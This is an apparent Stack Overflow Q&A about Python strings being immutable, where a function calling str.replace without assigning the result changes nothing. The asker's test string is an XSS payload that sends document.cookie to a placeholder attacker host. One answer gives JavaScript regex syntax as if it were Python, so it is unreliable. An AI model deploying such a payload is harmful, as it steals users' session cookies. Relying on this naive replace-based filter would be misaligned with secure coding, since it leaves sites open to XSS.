Reputation: 1055
I am trying to replace some key words in a string. Here is my function:
def clean_code(input):
input.replace('<script>', " ")
input.replace('</script>', " ")
input.replace('<a href>', " ")
input.replace('</a>', " ")
input.replace('>', ">")
input.replace('>', "<")
return input
and here is my other code and the string:
string1 = "This blog is STUPID! >\n" \
"<script>document.location='http://some_attacker/cookie.cgi?"\
" +document.cookie </script>"
print '\nstring1 cleaned of code'
print '------------------------'
print clean_code(string1)
My output is as follows, and I'm not sure why nothing has changed
string1 cleaned of code
------------------------
This blog is STUPID! >
<script>document.location='http://some_attacker/cookie.cgi? +document.cookie </script>
Upvotes: 2
Views: 8940
Reputation: 45542
Strings are immutable in Python. input.replace('</a>', " ")
does not alter input
. You need to assign the result back to input
.
But really you should use a parser like BeautifulSoup lxml.
Upvotes: 5
Reputation: 1570
String.replace
returns a new string that is the result of the substitution, but does not change the original. To do that, you will have to assign the return value back to the variable, like so:
myString = myString.replace("foo", "bar")
Furthermore, input.replace('<a href>', " ")
will only replace the exact substring "<a href>". To remove actual links, try input.replace(/<a\s[^>]*>/, " ")
.
Upvotes: 3
Reputation: 34698
.replace
is not an in-place mutation
Try this
def clean_code(input):
for tokens in [('<script>', " "),('</script>', " "),('<a href>', " "),
('</a>', " "),('>', ">"),('>', "<")]:
input = input.replace(tokens[0], tokens[1])
return input
Upvotes: 3
Reputation: 76755
Python strings are immutable:
input = input.replace('<script>', " ")
input = ...
Return a copy of string str with all occurrences of substring old replaced by new.
Upvotes: 8